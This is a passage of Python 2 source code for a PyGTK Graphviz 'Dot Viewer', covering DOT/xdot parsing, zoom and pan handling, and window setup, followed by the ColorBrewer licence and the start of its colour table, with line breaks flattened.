1)//self.tabsize + 1)*self.tabsize + 1 - pos = tabpos + 1 - self.col += len(text) - pos - - -class Parser: - - def __init__(self, lexer): - self.lexer = lexer - self.lookahead = self.lexer.next() - - def match(self, type): - if self.lookahead.type != type: - raise ParseError( - msg = 'unexpected token %r' % self.lookahead.text, - filename = self.lexer.filename, - line = self.lookahead.line, - col = self.lookahead.col) - - def skip(self, type): - while self.lookahead.type != type: - self.consume() - - def consume(self): - token = self.lookahead - self.lookahead = self.lexer.next() - return token - - -ID = 0 -STR_ID = 1 -HTML_ID = 2 -EDGE_OP = 3 - -LSQUARE = 4 -RSQUARE = 5 -LCURLY = 6 -RCURLY = 7 -COMMA = 8 -COLON = 9 -SEMI = 10 -EQUAL = 11 -PLUS = 12 - -STRICT = 13 -GRAPH = 14 -DIGRAPH = 15 -NODE = 16 -EDGE = 17 -SUBGRAPH = 18 - - -class DotScanner(Scanner): - - # token regular expression table - tokens = [ - # whitespace and comments - (SKIP, - r'[ \t\f\r\n\v]+|' - r'//[^\r\n]*|' - r'/\*.*?\*/|' - r'#[^\r\n]*', - False), - - # Alphanumeric IDs - (ID, r'[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*', True), - - # Numeric IDs - (ID, r'-?(?:\.[0-9]+|[0-9]+(?:\.[0-9]*)?)', False), - - # String IDs - (STR_ID, r'"[^"\\]*(?:\\.[^"\\]*)*"', False), - - # HTML IDs - (HTML_ID, r'<[^<>]*(?:<[^<>]*>[^<>]*)*>', False), - - # Edge operators - (EDGE_OP, r'-[>-]', False), - ] - - # symbol table - symbols = { - '[': LSQUARE, - ']': RSQUARE, - '{': LCURLY, - '}': RCURLY, - ',': COMMA, - ':': COLON, - ';': SEMI, - '=': EQUAL, - '+': PLUS, - } - - # literal table - literals = { - 'strict': STRICT, - 'graph': GRAPH, - 'digraph': DIGRAPH, - 'node': NODE, - 'edge': EDGE, - 'subgraph': SUBGRAPH, - } - - ignorecase = True - - -class DotLexer(Lexer): - - scanner = DotScanner() - - def filter(self, type, text): - # TODO: handle charset - if type == STR_ID: - text = text[1:-1] - - # line continuations - text = text.replace('\\\r\n', '') - text = text.replace('\\\r', '') - text = text.replace('\\\n', '') - - text = text.replace('\\r', '\r') - text = text.replace('\\n', '\n') - text = text.replace('\\t', '\t') - text = text.replace('\\', '') - - type = ID - - elif type == HTML_ID: - text = text[1:-1] - type = ID - - return type, text - - -class DotParser(Parser): - - def __init__(self, lexer): - Parser.__init__(self, lexer) - self.graph_attrs = {} - self.node_attrs = {} - self.edge_attrs = {} - - def parse(self): - self.parse_graph() - self.match(EOF) - - def parse_graph(self): - if self.lookahead.type == STRICT: - self.consume() - self.skip(LCURLY) - self.consume() - while self.lookahead.type != RCURLY: - self.parse_stmt() - self.consume() - - def parse_subgraph(self): - id = None - if self.lookahead.type == SUBGRAPH: - self.consume() - if self.lookahead.type == ID: - id = self.lookahead.text - self.consume() - if self.lookahead.type == LCURLY: - self.consume() - while self.lookahead.type != RCURLY: - self.parse_stmt() - self.consume() - return id - - def parse_stmt(self): - if self.lookahead.type == GRAPH: - self.consume() - attrs = self.parse_attrs() - self.graph_attrs.update(attrs) - self.handle_graph(attrs) - elif self.lookahead.type == NODE: - self.consume() - self.node_attrs.update(self.parse_attrs()) - elif self.lookahead.type == EDGE: - self.consume() - self.edge_attrs.update(self.parse_attrs()) - elif self.lookahead.type in (SUBGRAPH, LCURLY): - self.parse_subgraph() - else: - id = self.parse_node_id() - if self.lookahead.type == EDGE_OP: - self.consume() - node_ids = [id, self.parse_node_id()] - while self.lookahead.type == EDGE_OP: - node_ids.append(self.parse_node_id()) - attrs = self.parse_attrs() - for i in range(0, len(node_ids) - 1): - self.handle_edge(node_ids[i], node_ids[i + 1], attrs) - elif self.lookahead.type == EQUAL: - self.consume() - self.parse_id() - else: - attrs = self.parse_attrs() - self.handle_node(id, attrs) - if self.lookahead.type == SEMI: - self.consume() - - def parse_attrs(self): - attrs = {} - while self.lookahead.type == LSQUARE: - self.consume() - while self.lookahead.type != RSQUARE: - name, value = self.parse_attr() - attrs[name] = value - if self.lookahead.type == COMMA: - self.consume() - self.consume() - return attrs - - def parse_attr(self): - name = self.parse_id() - if self.lookahead.type == EQUAL: - self.consume() - value = self.parse_id() - else: - value = 'true' - return name, value - - def parse_node_id(self): - node_id = self.parse_id() - if self.lookahead.type == COLON: - self.consume() - port = self.parse_id() - if self.lookahead.type == COLON: - self.consume() - compass_pt = self.parse_id() - else: - compass_pt = None - else: - port = None - compass_pt = None - # XXX: we don't really care about port and compass point values when parsing xdot - return node_id - - def parse_id(self): - self.match(ID) - id = self.lookahead.text - self.consume() - return id - - def handle_graph(self, attrs): - pass - - def handle_node(self, id, attrs): - pass - - def handle_edge(self, src_id, dst_id, attrs): - pass - - -class XDotParser(DotParser): - - def __init__(self, xdotcode): - lexer = DotLexer(buf = xdotcode) - DotParser.__init__(self, lexer) - - self.nodes = [] - self.edges = [] - self.shapes = [] - self.node_by_name = {} - self.top_graph = True - - def handle_graph(self, attrs): - if self.top_graph: - try: - bb = attrs['bb'] - except KeyError: - return - - if not bb: - return - - xmin, ymin, xmax, ymax = map(float, bb.split(",")) - - self.xoffset = -xmin - self.yoffset = -ymax - self.xscale = 1.0 - self.yscale = -1.0 - # FIXME: scale from points to pixels - - self.width = xmax - xmin - self.height = ymax - ymin - - self.top_graph = False - - for attr in ("_draw_", "_ldraw_", "_hdraw_", "_tdraw_", "_hldraw_", "_tldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - self.shapes.extend(parser.parse()) - - def handle_node(self, id, attrs): - try: - pos = attrs['pos'] - except KeyError: - return - - x, y = self.parse_node_pos(pos) - w = float(attrs['width'])*72 - h = float(attrs['height'])*72 - shapes = [] - for attr in ("_draw_", "_ldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - shapes.extend(parser.parse()) - url = attrs.get('URL', None) - node = Node(x, y, w, h, shapes, url) - self.node_by_name[id] = node - if shapes: - self.nodes.append(node) - - def handle_edge(self, src_id, dst_id, attrs): - try: - pos = attrs['pos'] - except KeyError: - return - - points = self.parse_edge_pos(pos) - shapes = [] - for attr in ("_draw_", "_ldraw_", "_hdraw_", "_tdraw_", "_hldraw_", "_tldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - shapes.extend(parser.parse()) - if shapes: - src = self.node_by_name[src_id] - dst = self.node_by_name[dst_id] - self.edges.append(Edge(src, dst, points, shapes)) - - def parse(self): - DotParser.parse(self) - - return Graph(self.width, self.height, self.shapes, self.nodes, self.edges) - - def parse_node_pos(self, pos): - x, y = pos.split(",") - return self.transform(float(x), float(y)) - - def parse_edge_pos(self, pos): - points = [] - for entry in pos.split(' '): - fields = entry.split(',') - try: - x, y = fields - except ValueError: - # TODO: handle start/end points - continue - else: - points.append(self.transform(float(x), float(y))) - return points - - def transform(self, x, y): - # XXX: this is not the right place for this code - x = (x + self.xoffset)*self.xscale - y = (y + self.yoffset)*self.yscale - return x, y - - -class Animation(object): - - step = 0.03 # seconds - - def __init__(self, dot_widget): - self.dot_widget = dot_widget - self.timeout_id = None - - def start(self): - self.timeout_id = gobject.timeout_add(int(self.step * 1000), self.tick) - - def stop(self): - self.dot_widget.animation = NoAnimation(self.dot_widget) - if self.timeout_id is not None: - gobject.source_remove(self.timeout_id) - self.timeout_id = None - - def tick(self): - self.stop() - - -class NoAnimation(Animation): - - def start(self): - pass - - def stop(self): - pass - - -class LinearAnimation(Animation): - - duration = 0.6 - - def start(self): - self.started = time.time() - Animation.start(self) - - def tick(self): - t = (time.time() - self.started) / self.duration - self.animate(max(0, min(t, 1))) - return (t < 1) - - def animate(self, t): - pass - - -class MoveToAnimation(LinearAnimation): - - def __init__(self, dot_widget, target_x, target_y): - Animation.__init__(self, dot_widget) - self.source_x = dot_widget.x - self.source_y = dot_widget.y - self.target_x = target_x - self.target_y = target_y - - def animate(self, t): - sx, sy = self.source_x, self.source_y - tx, ty = self.target_x, self.target_y - self.dot_widget.x = tx * t + sx * (1-t) - self.dot_widget.y = ty * t + sy * (1-t) - self.dot_widget.queue_draw() - - -class ZoomToAnimation(MoveToAnimation): - - def __init__(self, dot_widget, target_x, target_y): - MoveToAnimation.__init__(self, dot_widget, target_x, target_y) - self.source_zoom = dot_widget.zoom_ratio - self.target_zoom = self.source_zoom - self.extra_zoom = 0 - - middle_zoom = 0.5 * (self.source_zoom + self.target_zoom) - - distance = math.hypot(self.source_x - self.target_x, - self.source_y - self.target_y) - rect = self.dot_widget.get_allocation() - visible = min(rect.width, rect.height) / self.dot_widget.zoom_ratio - visible *= 0.9 - if distance > 0: - desired_middle_zoom = visible / distance - self.extra_zoom = min(0, 4 * (desired_middle_zoom - middle_zoom)) - - def animate(self, t): - a, b, c = self.source_zoom, self.extra_zoom, self.target_zoom - self.dot_widget.zoom_ratio = c*t + b*t*(1-t) + a*(1-t) - self.dot_widget.zoom_to_fit_on_resize = False - MoveToAnimation.animate(self, t) - - -class DragAction(object): - - def __init__(self, dot_widget): - self.dot_widget = dot_widget - - def on_button_press(self, event): - self.startmousex = self.prevmousex = event.x - self.startmousey = self.prevmousey = event.y - self.start() - - def on_motion_notify(self, event): - if event.is_hint: - x, y, state = event.window.get_pointer() - else: - x, y, state = event.x, event.y, event.state - deltax = self.prevmousex - x - deltay = self.prevmousey - y - self.drag(deltax, deltay) - self.prevmousex = x - self.prevmousey = y - - def on_button_release(self, event): - self.stopmousex = event.x - self.stopmousey = event.y - self.stop() - - def draw(self, cr): - pass - - def start(self): - pass - - def drag(self, deltax, deltay): - pass - - def stop(self): - pass - - def abort(self): - pass - - -class NullAction(DragAction): - - def on_motion_notify(self, event): - if event.is_hint: - x, y, state = event.window.get_pointer() - else: - x, y, state = event.x, event.y, event.state - dot_widget = self.dot_widget - item = dot_widget.get_url(x, y) - if item is None: - item = dot_widget.get_jump(x, y) - if item is not None: - dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.HAND2)) - dot_widget.set_highlight(item.highlight) - else: - dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW)) - dot_widget.set_highlight(None) - - -class PanAction(DragAction): - - def start(self): - self.dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.FLEUR)) - - def drag(self, deltax, deltay): - self.dot_widget.x += deltax / self.dot_widget.zoom_ratio - self.dot_widget.y += deltay / self.dot_widget.zoom_ratio - self.dot_widget.queue_draw() - - def stop(self): - self.dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW)) - - abort = stop - - -class ZoomAction(DragAction): - - def drag(self, deltax, deltay): - self.dot_widget.zoom_ratio *= 1.005 ** (deltax + deltay) - self.dot_widget.zoom_to_fit_on_resize = False - self.dot_widget.queue_draw() - - def stop(self): - self.dot_widget.queue_draw() - - -class ZoomAreaAction(DragAction): - - def drag(self, deltax, deltay): - self.dot_widget.queue_draw() - - def draw(self, cr): - cr.save() - cr.set_source_rgba(.5, .5, 1.0, 0.25) - cr.rectangle(self.startmousex, self.startmousey, - self.prevmousex - self.startmousex, - self.prevmousey - self.startmousey) - cr.fill() - cr.set_source_rgba(.5, .5, 1.0, 1.0) - cr.set_line_width(1) - cr.rectangle(self.startmousex - .5, self.startmousey - .5, - self.prevmousex - self.startmousex + 1, - self.prevmousey - self.startmousey + 1) - cr.stroke() - cr.restore() - - def stop(self): - x1, y1 = self.dot_widget.window2graph(self.startmousex, - self.startmousey) - x2, y2 = self.dot_widget.window2graph(self.stopmousex, - self.stopmousey) - self.dot_widget.zoom_to_area(x1, y1, x2, y2) - - def abort(self): - self.dot_widget.queue_draw() - - -class DotWidget(gtk.DrawingArea): - """PyGTK widget that draws dot graphs.""" - - __gsignals__ = { - 'expose-event': 'override', - 'clicked' : (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_STRING, gtk.gdk.Event)) - } - - filter = 'dot' - - def __init__(self): - gtk.DrawingArea.__init__(self) - - self.graph = Graph() - self.openfilename = None - - self.set_flags(gtk.CAN_FOCUS) - - self.add_events(gtk.gdk.BUTTON_PRESS_MASK | gtk.gdk.BUTTON_RELEASE_MASK) - self.connect("button-press-event", self.on_area_button_press) - self.connect("button-release-event", self.on_area_button_release) - self.add_events(gtk.gdk.POINTER_MOTION_MASK | gtk.gdk.POINTER_MOTION_HINT_MASK | gtk.gdk.BUTTON_RELEASE_MASK) - self.connect("motion-notify-event", self.on_area_motion_notify) - self.connect("scroll-event", self.on_area_scroll_event) - self.connect("size-allocate", self.on_area_size_allocate) - - self.connect('key-press-event', self.on_key_press_event) - - self.x, self.y = 0.0, 0.0 - self.zoom_ratio = 1.0 - self.zoom_to_fit_on_resize = False - self.animation = NoAnimation(self) - self.drag_action = NullAction(self) - self.presstime = None - self.highlight = None - - def set_filter(self, filter): - self.filter = filter - - def set_dotcode(self, dotcode, filename=''): - if isinstance(dotcode, unicode): - dotcode = dotcode.encode('utf8') - p = subprocess.Popen( - [self.filter, '-Txdot'], - stdin=subprocess.PIPE, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - shell=False, - universal_newlines=True - ) - xdotcode, error = p.communicate(dotcode) - if p.returncode != 0: - dialog = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=error, - buttons=gtk.BUTTONS_OK) - dialog.set_title('Dot Viewer') - dialog.run() - dialog.destroy() - return False - try: - self.set_xdotcode(xdotcode) - except ParseError, ex: - dialog = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=str(ex), - buttons=gtk.BUTTONS_OK) - dialog.set_title('Dot Viewer') - dialog.run() - dialog.destroy() - return False - else: - self.openfilename = filename - return True - - def set_xdotcode(self, xdotcode): - #print xdotcode - parser = XDotParser(xdotcode) - self.graph = parser.parse() - self.zoom_image(self.zoom_ratio, center=True) - - def reload(self): - if self.openfilename is not None: - try: - fp = file(self.openfilename, 'rt') - self.set_dotcode(fp.read(), self.openfilename) - fp.close() - except IOError: - pass - - def do_expose_event(self, event): - cr = self.window.cairo_create() - - # set a clip region for the expose event - cr.rectangle( - event.area.x, event.area.y, - event.area.width, event.area.height - ) - cr.clip() - - cr.set_source_rgba(1.0, 1.0, 1.0, 1.0) - cr.paint() - - cr.save() - rect = self.get_allocation() - cr.translate(0.5*rect.width, 0.5*rect.height) - cr.scale(self.zoom_ratio, self.zoom_ratio) - cr.translate(-self.x, -self.y) - - self.graph.draw(cr, highlight_items=self.highlight) - cr.restore() - - self.drag_action.draw(cr) - - return False - - def get_current_pos(self): - return self.x, self.y - - def set_current_pos(self, x, y): - self.x = x - self.y = y - self.queue_draw() - - def set_highlight(self, items): - if self.highlight != items: - self.highlight = items - self.queue_draw() - - def zoom_image(self, zoom_ratio, center=False, pos=None): - if center: - self.x = self.graph.width/2 - self.y = self.graph.height/2 - elif pos is not None: - rect = self.get_allocation() - x, y = pos - x -= 0.5*rect.width - y -= 0.5*rect.height - self.x += x / self.zoom_ratio - x / zoom_ratio - self.y += y / self.zoom_ratio - y / zoom_ratio - self.zoom_ratio = zoom_ratio - self.zoom_to_fit_on_resize = False - self.queue_draw() - - def zoom_to_area(self, x1, y1, x2, y2): - rect = self.get_allocation() - width = abs(x1 - x2) - height = abs(y1 - y2) - self.zoom_ratio = min( - float(rect.width)/float(width), - float(rect.height)/float(height) - ) - self.zoom_to_fit_on_resize = False - self.x = (x1 + x2) / 2 - self.y = (y1 + y2) / 2 - self.queue_draw() - - def zoom_to_fit(self): - rect = self.get_allocation() - rect.x += self.ZOOM_TO_FIT_MARGIN - rect.y += self.ZOOM_TO_FIT_MARGIN - rect.width -= 2 * self.ZOOM_TO_FIT_MARGIN - rect.height -= 2 * self.ZOOM_TO_FIT_MARGIN - zoom_ratio = min( - float(rect.width)/float(self.graph.width), - float(rect.height)/float(self.graph.height) - ) - self.zoom_image(zoom_ratio, center=True) - self.zoom_to_fit_on_resize = True - - ZOOM_INCREMENT = 1.25 - ZOOM_TO_FIT_MARGIN = 12 - - def on_zoom_in(self, action): - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT) - - def on_zoom_out(self, action): - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT) - - def on_zoom_fit(self, action): - self.zoom_to_fit() - - def on_zoom_100(self, action): - self.zoom_image(1.0) - - POS_INCREMENT = 100 - - def on_key_press_event(self, widget, event): - if event.keyval == gtk.keysyms.Left: - self.x -= self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Right: - self.x += self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Up: - self.y -= self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Down: - self.y += self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Page_Up: - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT) - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Page_Down: - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT) - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Escape: - self.drag_action.abort() - self.drag_action = NullAction(self) - return True - if event.keyval == gtk.keysyms.r: - self.reload() - return True - if event.keyval == gtk.keysyms.q: - gtk.main_quit() - return True - return False - - def get_drag_action(self, event): - state = event.state - if event.button in (1, 2): # left or middle button - if state & gtk.gdk.CONTROL_MASK: - return ZoomAction - elif state & gtk.gdk.SHIFT_MASK: - return ZoomAreaAction - else: - return PanAction - return NullAction - - def on_area_button_press(self, area, event): - self.animation.stop() - self.drag_action.abort() - action_type = self.get_drag_action(event) - self.drag_action = action_type(self) - self.drag_action.on_button_press(event) - self.presstime = time.time() - self.pressx = event.x - self.pressy = event.y - return False - - def is_click(self, event, click_fuzz=4, click_timeout=1.0): - assert event.type == gtk.gdk.BUTTON_RELEASE - if self.presstime is None: - # got a button release without seeing the press? - return False - # XXX instead of doing this complicated logic, shouldn't we listen - # for gtk's clicked event instead? - deltax = self.pressx - event.x - deltay = self.pressy - event.y - return (time.time() < self.presstime + click_timeout - and math.hypot(deltax, deltay) < click_fuzz) - - def on_area_button_release(self, area, event): - self.drag_action.on_button_release(event) - self.drag_action = NullAction(self) - if event.button == 1 and self.is_click(event): - x, y = int(event.x), int(event.y) - url = self.get_url(x, y) - if url is not None: - self.emit('clicked', unicode(url.url), event) - else: - jump = self.get_jump(x, y) - if jump is not None: - self.animate_to(jump.x, jump.y) - - return True - if event.button == 1 or event.button == 2: - return True - return False - - def on_area_scroll_event(self, area, event): - if event.direction == gtk.gdk.SCROLL_UP: - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT, - pos=(event.x, event.y)) - return True - if event.direction == gtk.gdk.SCROLL_DOWN: - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT, - pos=(event.x, event.y)) - return True - return False - - def on_area_motion_notify(self, area, event): - self.drag_action.on_motion_notify(event) - return True - - def on_area_size_allocate(self, area, allocation): - if self.zoom_to_fit_on_resize: - self.zoom_to_fit() - - def animate_to(self, x, y): - self.animation = ZoomToAnimation(self, x, y) - self.animation.start() - - def window2graph(self, x, y): - rect = self.get_allocation() - x -= 0.5*rect.width - y -= 0.5*rect.height - x /= self.zoom_ratio - y /= self.zoom_ratio - x += self.x - y += self.y - return x, y - - def get_url(self, x, y): - x, y = self.window2graph(x, y) - return self.graph.get_url(x, y) - - def get_jump(self, x, y): - x, y = self.window2graph(x, y) - return self.graph.get_jump(x, y) - - -class DotWindow(gtk.Window): - - ui = ''' - - - - - - - - - - - - ''' - - def __init__(self): - gtk.Window.__init__(self) - - self.graph = Graph() - - window = self - - window.set_title('Dot Viewer') - window.set_default_size(512, 512) - vbox = gtk.VBox() - window.add(vbox) - - self.widget = DotWidget() - - # Create a UIManager instance - uimanager = self.uimanager = gtk.UIManager() - - # Add the accelerator group to the toplevel window - accelgroup = uimanager.get_accel_group() - window.add_accel_group(accelgroup) - - # Create an ActionGroup - actiongroup = gtk.ActionGroup('Actions') - self.actiongroup = actiongroup - - # Create actions - actiongroup.add_actions(( - ('Open', gtk.STOCK_OPEN, None, None, None, self.on_open), - ('Reload', gtk.STOCK_REFRESH, None, None, None, self.on_reload), - ('ZoomIn', gtk.STOCK_ZOOM_IN, None, None, None, self.widget.on_zoom_in), - ('ZoomOut', gtk.STOCK_ZOOM_OUT, None, None, None, self.widget.on_zoom_out), - ('ZoomFit', gtk.STOCK_ZOOM_FIT, None, None, None, self.widget.on_zoom_fit), - ('Zoom100', gtk.STOCK_ZOOM_100, None, None, None, self.widget.on_zoom_100), - )) - - # Add the actiongroup to the uimanager - uimanager.insert_action_group(actiongroup, 0) - - # Add a UI descrption - uimanager.add_ui_from_string(self.ui) - - # Create a Toolbar - toolbar = uimanager.get_widget('/ToolBar') - vbox.pack_start(toolbar, False) - - vbox.pack_start(self.widget) - - self.set_focus(self.widget) - - self.show_all() - - def update(self, filename): - import os - if not hasattr(self, "last_mtime"): - self.last_mtime = None - - current_mtime = os.stat(filename).st_mtime - if current_mtime != self.last_mtime: - self.last_mtime = current_mtime - self.open_file(filename) - - return True - - def set_filter(self, filter): - self.widget.set_filter(filter) - - def set_dotcode(self, dotcode, filename=''): - if self.widget.set_dotcode(dotcode, filename): - self.set_title(os.path.basename(filename) + ' - Dot Viewer') - self.widget.zoom_to_fit() - - def set_xdotcode(self, xdotcode, filename=''): - if self.widget.set_xdotcode(xdotcode): - self.set_title(os.path.basename(filename) + ' - Dot Viewer') - self.widget.zoom_to_fit() - - def open_file(self, filename): - try: - fp = file(filename, 'rt') - self.set_dotcode(fp.read(), filename) - fp.close() - except IOError, ex: - dlg = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=str(ex), - buttons=gtk.BUTTONS_OK) - dlg.set_title('Dot Viewer') - dlg.run() - dlg.destroy() - - def on_open(self, action): - chooser = gtk.FileChooserDialog(title="Open dot File", - action=gtk.FILE_CHOOSER_ACTION_OPEN, - buttons=(gtk.STOCK_CANCEL, - gtk.RESPONSE_CANCEL, - gtk.STOCK_OPEN, - gtk.RESPONSE_OK)) - chooser.set_default_response(gtk.RESPONSE_OK) - filter = gtk.FileFilter() - filter.set_name("Graphviz dot files") - filter.add_pattern("*.dot") - chooser.add_filter(filter) - filter = gtk.FileFilter() - filter.set_name("All files") - filter.add_pattern("*") - chooser.add_filter(filter) - if chooser.run() == gtk.RESPONSE_OK: - filename = chooser.get_filename() - chooser.destroy() - self.open_file(filename) - else: - chooser.destroy() - - def on_reload(self, action): - self.widget.reload() - - -def main(): - import optparse - - parser = optparse.OptionParser( - usage='\n\t%prog [file]', - version='%%prog %s' % __version__) - parser.add_option( - '-f', '--filter', - type='choice', choices=('dot', 'neato', 'twopi', 'circo', 'fdp'), - dest='filter', default='dot', - help='graphviz filter: dot, neato, twopi, circo, or fdp [default: %default]') - - (options, args) = parser.parse_args(sys.argv[1:]) - if len(args) > 1: - parser.error('incorrect number of arguments') - - win = DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter(options.filter) - if len(args) >= 1: - if args[0] == '-': - win.set_dotcode(sys.stdin.read()) - else: - win.open_file(args[0]) - gobject.timeout_add(1000, win.update, args[0]) - gtk.main() - - -# Apache-Style Software License for ColorBrewer software and ColorBrewer Color -# Schemes, Version 1.1 -# -# Copyright (c) 2002 Cynthia Brewer, Mark Harrower, and The Pennsylvania State -# University. All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions as source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. The end-user documentation included with the redistribution, if any, -# must include the following acknowledgment: -# -# This product includes color specifications and designs developed by -# Cynthia Brewer (http://colorbrewer.org/). -# -# Alternately, this acknowledgment may appear in the software itself, if and -# wherever such third-party acknowledgments normally appear. -# -# 3. The name "ColorBrewer" must not be used to endorse or promote products -# derived from this software without prior written permission. For written -# permission, please contact Cynthia Brewer at cbrewer@psu.edu. -# -# 4. Products derived from this software may not be called "ColorBrewer", -# nor may "ColorBrewer" appear in their name, without prior written -# permission of Cynthia Brewer. -# -# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, -# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CYNTHIA -# BREWER, MARK HARROWER, OR THE PENNSYLVANIA STATE UNIVERSITY BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -brewer_colors = { - 'accent3': [(127, 201, 127), (190, 174, 212), (253, 192, 134)], - 'accent4': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153)], - 'accent5': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176)], - 'accent6': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127)], - 'accent7': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127), (191, 91, 23)], - 'accent8': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127), (191, 91, 23), (102, 102, 102)], - 'blues3': [(222, 235, 247), (158, 202, 225), (49, 130, 189)], - 'blues4': [(239, 243, 255), (189, 215, 231), (107, 174, 214), (33, 113, 181)], - 'blues5': [(239, 243, 255), (189, 215, 231), (107, 174, 214), (49, 130, 189), (8, 81, 156)], - 'blues6': [(239, 243, 255), (198, 219, 239), (158, 202, 225), (107, 174, 214), (49, 130, 189), (8, 81, 156)], - 'blues7': [(239, 243, 255), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 69, 148)], - 'blues8': [(247, 251, 255), (222, 235, 247), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 69, 148)], - 'blues9': [(247, 251, 255), (222, 235, 247), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 81, 156), (8, 48, 107)], - 'brbg10': [(84, 48, 5), (0, 60, 48), (140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'brbg11': [(84, 48, 5), (1, 102, 94), (0, 60, 48), (140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (245, 245, 245), (199, 234, 229), (128, 205, 193), (53, 151, 143)], - 'brbg3': [(216, 179, 101), (245, 245, 245), (90, 180, 172)], - 'brbg4': [(166, 97, 26), (223, 194, 125), (128, 205, 193), (1, 133, 113)], - 'brbg5': [(166, 97, 26), (223, 194, 125), (245, 245, 245), (128, 205, 193), (1, 133, 113)], - 'brbg6': [(140, 81, 10), (216, 179, 101), (246, 232, 195), (199, 234, 229), (90, 180, 172), (1, 102, 94)], - 'brbg7': [(140, 81, 10), (216, 179, 101), (246, 232, 195), (245, 245, 245), (199, 234, 229), (90, 180, 172), (1, 102, 94)], - 'brbg8': [(140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'brbg9': [(140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (245, 245, 245), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'bugn3': [(229, 245, 249), (153, 216, 201), (44, 162, 95)], - 'bugn4': [(237, 248, 251), (178, 226, 226), (102, 194, 164), (35, 139, 69)], - 'bugn5': [(237, 248, 251), (178, 226, 226), (102, 194, 164), (44, 162, 95), (0, 109, 44)], - 'bugn6': [(237, 248, 251), (204, 236, 230), (153, 216, 201), (102, 194, 164), (44, 162, 95), (0, 109, 44)], - 'bugn7': [(237, 248, 251), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 88, 36)], - 'bugn8': [(247, 252, 253), (229, 245, 249), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 88, 36)], - 'bugn9': [(247, 252, 253), (229, 245, 249), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 109, 44), (0, 68, 27)], - 'bupu3': [(224, 236, 244), (158, 188, 218), (136, 86, 167)], - 'bupu4': [(237, 248, 251), (179, 205, 227), (140, 150, 198), (136, 65, 157)], - 'bupu5': [(237, 248, 251), (179, 205, 227), (140, 150, 198), (136, 86, 167), (129, 15, 124)], - 'bupu6': [(237, 248, 251), (191, 211, 230), (158, 188, 218), (140, 150, 198), (136, 86, 167), (129, 15, 124)], - 'bupu7': [(237, 248, 251), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (110, 1, 107)], - 'bupu8': [(247, 252, 253), (224, 236, 244), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (110, 